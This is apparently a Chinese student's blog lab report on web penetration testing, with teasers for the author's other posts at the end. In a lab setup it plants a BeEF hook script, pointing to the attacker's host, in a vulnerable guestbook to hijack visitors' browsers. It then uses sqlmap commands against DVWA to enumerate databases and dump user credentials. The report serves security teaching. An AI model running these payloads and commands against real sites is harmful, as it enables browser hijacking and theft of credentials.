代码编织梦想

前言

实验目的

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

XSS部分:利用Beef劫持被攻击者客户端浏览器

实验环境搭建

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。

使用win2003server_IIS服务搭建纯在XSS漏洞的网站

参考:Windows Server 2003安装IIS服务并配置WEB站点

具体实现:

首先将实验三文件夹中的GuestBook文件夹复制到win2003server虚拟机(在此之前要先安装VMtools),然后找到IIS(路径为 开始->程序->管理工具->IIS),在IIS里添加网站,设置好IP、权限和端口等(见上面参考链接)之后,要在Web服务扩展中将 Active Server Pages 设置为允许(不一定是默认允许的),否则无法打开网站,见下图:

Active Server Pages禁止情况下:

在这里插入图片描述
Active Server Pages允许情况下:

在这里插入图片描述
这个问题也是困扰了本人很久,分享出来希望可以帮助到大家。

到此实验环境搭建就结束啦,不清楚的话可以欢迎在评论区或者私信与本人交流~

1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞

利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图如下:

在这里插入图片描述
可以发现在erro.asp和add.asp里面都存在一个XSS漏洞:

在这里插入图片描述

2.Kali使用beef生成恶意代码

在kali里面打开beef

在这里插入图片描述
仿造上面的自己写一个:

<script src="http://Kali的ip:3000/hook.js"></script>

例如:

<script src="http://192.168.189.131:3000/hook.js"></script>

3.访问http://留言簿网站,将恶意代码写入网站留言板

在kali访问留言簿的网址留言:
在这里插入图片描述
那有的小伙伴可能就要问了,那为什么不直接在win2003的虚拟机上面留言呢?还得复制url到kali里面,多麻烦呀

原因:根据实际,正常来说,是无法直接使用开启网站服务的主机在自己的网站上留言恶意代码的,所以呀所以,在kali上面留言才更加实际一些嘛,听懂掌声~

留言完了记得在Firefox打开beef,账号密码默认都是beef(新版的好像不能直接使用默认账户密码,记得修改嗷)

然后在win2003这边查看留言并观察kali beef的变化:
在这里插入图片描述

可以看到好像多了一些东西(箭头所指),仔细一看,好家伙,好像是自己的……
在这里插入图片描述
之后再使用win10的物理机访问留言簿网站,然后再到kali beef里面查看变化:

在这里插入图片描述
确实是劫持到了自己的物理机……

在beef里可以查看到一些信息:

在这里插入图片描述
还可以指定劫持网站转为学校主页或者其他的网站(比如百度):

在beef内操作:

在这里插入图片描述
将劫持的网站转为百度:
在这里插入图片描述
物理机上浏览器的变化:
在这里插入图片描述
再试试转为学校主页叭:

在这里插入图片描述
物理机上面的变化:

在这里插入图片描述
这两个操作好像不能连续的进行,得在物理机上重新进一次留言网站才可以转到学校网站,不过还是很帅,有成功的惊艳到本小白哈哈

4.管理员登录login.htm,账号密码均为admin,审核用户留言

其实在上一步已经有啦,但是不能让标题空在这里,不然标题也会觉得孤独的。

在这里插入图片描述

5.回答问题

问题:实验中XSS攻击属于哪种类型?

答:本次实验中的XSS攻击属于存储型。

(转自:https://blog.csdn.net/qq_41783309/article/details/80615909

在这里插入图片描述

SQL注入部分:DVWA+SQLmap+Mysql注入实战

sqlmap语法参考

在这里插入图片描述
在这里插入图片描述

1.注入点发现

要进行SQL注入,首先肯定是要判断是否有注入漏洞。在dvwa(搭建好Metasplotiable 2之后获取ip,在浏览器上访问ip,就可以找到啦)上先将DVWA Security的Script Security等级改为low,如下图,原因后面会补充嗷~

在这里插入图片描述
然后在 SQL Injecttion的User ID 输入栏输入1,返回正常,再输入 1’ ,注意多了个单引号,报错,返回You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
此时可以断定有SQL注入漏洞。

在这里插入图片描述

输入1’ 以及报错返回:

在这里插入图片描述
同时也可以得到url: http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

当然,还需要获取 cookie中的 PHPSESSID:在Firefox(google)中按F12,找到cookie,即可查看cookie,如下图:

在这里插入图片描述
接下来就可以进行SQL注入啦~

2.枚举当前使用的数据库名称和用户名

输入的命令:

sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -b --current-db --current-user

sqlmap输出:

在这里插入图片描述

3.枚举数据库用户名和密码

输入的命令:

sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --users --password

sqlmap输出:

在这里插入图片描述

4.枚举数据库

输入的命令:

sqlmap -u "Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --dbs

sqlmap输出:

在这里插入图片描述

5.枚举数据库和指定数据库的数据表

输入的命令:

sqlmap -u “Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -D dvwa --tables

sqlmap输出:

在这里插入图片描述

6.获取指定数据库和表中所有列的信息

输入的命令:

sqlmap -u “http://Metasplotiable 2的IP/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ --string=“Surname” -D dvwa -T users --columns

sqlmap输出:

在这里插入图片描述

7.枚举指定数据表中的所有用户名与密码,并down到本地

输入的命令:

sqlmap -u “http://125.217.53.8/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=a00cdd0edd625af6fc0a6f27c8952be3’ -D dvwa -T users -C user,password --dump

sqlmap输出:
在这里插入图片描述
在此可以看到数据表中的所有用户名和密码以及down到本地的csv文件路径。

Tips:
带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。

查看本地的users.csv

可以此新建一个终端窗口,然后 cd 到dvwa文件夹,输入命令: ls -a ,可以查看当前文件夹包含的文件(包括隐藏文件),如下图:

在这里插入图片描述
然后输入命令 cat users.csv,就可以查看down本地的用户名和密码啦~

总结

这次的实验对我来说确实是有一些难度,不过好在社团的学习环境很棒,总是有大佬救我于水深火热之中,让我得以成功完成实验,在此感谢一波大佬们的帮助。

写的是实验报告,就不能像之前自己写的博客那样口水话一堆又一堆,可能看起来就没有那么好玩儿~ 也希望小榆不要觉得无聊哇。以后也会写出不枯燥又有内容的文章的,用心分享自己学到的东西。

每次写网络渗透测试实验总能感觉到自己很菜,发现又有很多东西不会,但是对自己狠一些总是能写完的,毕竟没有困难的工作,只有勇敢的打工人。

好啦,本篇文章到这里就结束啦,希望大家看完都能有所收获,有问题的话欢迎在评论区指正喔~

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/qq_45746876/article/details/110069299

解决Kali下使用BurpSuite+Firefox证书错误的问题-爱代码爱编程

解决Kali下使用BurpSuite+Firefox证书错误问题 问题现象解决方案再次验证 问题现象 问题现象如下图所示: Firefox选择:Advanced - Accept the Risk and Continue ,通过BurpSuite查看,无法获取被动扫描信息: 解决方案 Firefox安装:SwitchyOmega 插

外连Kali实现图形界面-爱代码爱编程

外连Kali实现图形界面 更换Kali源安装图形化界面配置xrdp实现远程连接图形界面 大多数情况下,我们一般只会在自己虚拟机上装Kali,当遇到些特殊情况需要将Kali装到某云服务器上,可服务器上只有ssh命令,那如何实现Kali自身的图形界面呢? 更换Kali源 首先我们来换下Kali的源 这里选用2020年中科大的 de

kali安装w3af出现的问题及解决方法(附w3af安装)-爱代码爱编程

kali安装软件出现下面的情况的解决方法 文末有惊喜 Running updmap-sys. This may take some time... done. Running mktexlsr /var/lib/texmf ... done. Building format(s) --all. This may take some time... d

[Kali]--栈缓冲区溢出-爱代码爱编程

栈缓冲区溢出 内存数据分布图 Text:包含程序代码Data:包含全局变量,静态变量,该段的大小在编译时计算堆:存储动态变量,new动作会在堆上分配内存栈:保存函数参数,局部变量,函数调用时栈空间消耗就会变大。堆栈内存是运行时实时分配的 CPU通用寄存器 EIP:指令指针ESP:栈指针(栈顶)EBP:基指针(栈底)ESI:源变址寄存器EDI:目标变

2020最新kali设置root用户(直接设置root用户/单用户模式设置root用户)-爱代码爱编程

2020kali设置root用户 1.kali知道密码时,直接修改kali的root密码1.登录kali时使用普通用户2.打开kali的命令终端,直接输入`sudo passwd root`进行修改3.登出当前普通用户,切换`root`用户2.kali忘记密码时,进入单用户模式直接修改kali的root密码1.开机时进入系统选择按`e`2.在编辑页

2020最新kali新老系统镜像地址-爱代码爱编程

2020最新kali新老系统镜像地址 1.kali新系统镜像地址2.kali老系统镜像地址 1.kali新系统镜像地址 #kali系统下载地址 https://www.kali.org/downloads/ #kali系统镜像下载地址 http://cdimage.kali.org/kali-images/ #kali的虚拟机版本下载地址 h

Kali网络渗透测试二——网络嗅探与身份认证-爱代码爱编程

文章目录 前言实验目的系统环境:Kali Linux 2、Windows网络环境:交换网络结构实验工具:Arpspoof、WireShark、BurpSuite、fcrackzip(用于zip密码破解)。实验步骤一.网络嗅探部分:1.A主机上外网,B运行sinffer(Wireshark)选定只抓源为A的数据)。2.ARP欺骗攻击3. FTP数据还

织梦任意前台用户密码修改漏洞复现二 —— 拦截修改密码请求并修改管理员/用户密码-爱代码爱编程

嘿嘿,小伙伴们,我又来啦 昨天更新的漏洞复现一 ——相关环境的搭建:https://blog.csdn.net/qq_45746876/article/details/109105048 好像忘记写关于浏览器的内容了,失误失误,那咱们现在补上叭 Burpsuite就是一个本地代理,所有经过Burpsuite的web请求都会被拦截到,但是前提是我们要设

织梦任意前台密码修改漏洞复现一 ——相关环境搭建与网站搭建-爱代码爱编程

先给大家科普一下织梦前台任意用户密码修改的漏洞: 简而言之就是,利用这个漏洞就可以修改使用该模板搭建的网站的任意用户的密码,听着是不是有一丢丢小恐怖?不慌,我们要做的就是复现这个漏洞,嘿嘿~ 本次漏洞复现所需要的工具: 1.织梦模板:DedeCMS-V5.7-UTF8-SP2 下载地址:http://www.dedecms.com/products

Kali网络渗透实验四-爱代码爱编程

Kali网络渗透实验四 前言实验目的系统环境与实验工具实验步骤1.发现目标2.利用NMAP扫描目标主机3.查看目标网站找到有用信息4.利用whatweb探测目标网站使用的CMS模板5.网络搜索wpscan6.使用 Dirb 爆破网站目录7.浏览器访问该目录(路径)8.利用Wireshark分析该数据包9.利用上一步得到的信息进入网站后台10.利用该